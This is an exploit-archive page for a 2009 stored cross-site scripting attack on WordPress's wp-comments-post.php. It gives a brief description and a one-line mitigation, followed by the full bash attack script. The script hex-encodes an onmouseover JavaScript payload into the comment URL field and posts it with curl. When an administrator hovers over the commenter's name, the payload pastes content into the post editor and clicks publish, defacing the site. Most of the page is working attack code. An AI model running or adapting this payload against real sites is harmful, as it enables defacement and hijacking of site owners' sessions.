header-logo
Suggest Exploit
vendor:
WordPress
by:
milw0rm.com
7,5
CVSS
HIGH
Cross-site Scripting (XSS)
79
CWE
Product Name: WordPress
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

WordPress wp-comments-post.php XSS

This exploit allows an attacker to inject malicious JavaScript code into a WordPress website by using the wp-comments-post.php file. The malicious code is injected into the 'title' or 'content' field of a comment, and is triggered when an administrator or other user with sufficient privileges mouses over the comment. The malicious code can be used to steal cookies, hijack sessions, or perform other malicious activities.

Mitigation:

Ensure that all user-supplied input is properly sanitized and validated before being used in the application.
Source

Exploit-DB raw data:

#!/bin/bash

echo "wp281.quickprz // iso^kpsbr"

SITE=$1
COMMENT=$2
MESSAGE="h4x0riZed by the superfreakaz0rz"

if [ "X$SITE" = "X" ]; then
	echo "$0 <url> [postID]"
	echo "f.e. $0 www.worstpress.eu"
	exit
fi

if [ "X$POSTID" = "X" ]; then
	POSTID=1
fi


echo "[+] building payload"

WHERE="title" # can also be 'content'
PATH="$SITE/wp-comments-post.php"

WHERE=`echo -n "$WHERE" | /usr/bin/od -t d1 -A n | /bin/sed 's/\\s\\s*/,/g' | /bin/sed 's/^,//'`
EVILURL="http://w.ch'onmouseover='document.getElementById(String.fromCharCode($WHERE)).value=this.innerHTML;document.getElementById(String.fromCharCode(112,117,98,108,105,115,104)).click();"
echo "[-] payload is $EVILURL for '$MESSAGE'"

EVILURL=`echo -n "$EVILURL" | /usr/bin/od -t x1 -A n | /usr/bin/tr " " %`
MESSAGE=`echo -n "$MESSAGE" | /usr/bin/od -t x1 -A n | /usr/bin/tr " " %`
RNDDATA=`/bin/date +%S%s`;

echo "[!] delivering data"
/usr/bin/curl -A "Quickprz" -d "author=$MESSAGE&email=kelly@hackforums.net&url=$EVILURL&comment=hi+there%5F+this+is+just+some+very+harmless+spam+$RNDDATA&submit=Submit+Comment&comment_post_ID=$POSTID" $PATH

echo "[X] all done. now wait for admin to mouse-over that name."

# milw0rm.com [2009-07-24]

Navigation

Suggest Exploit

Services By CQR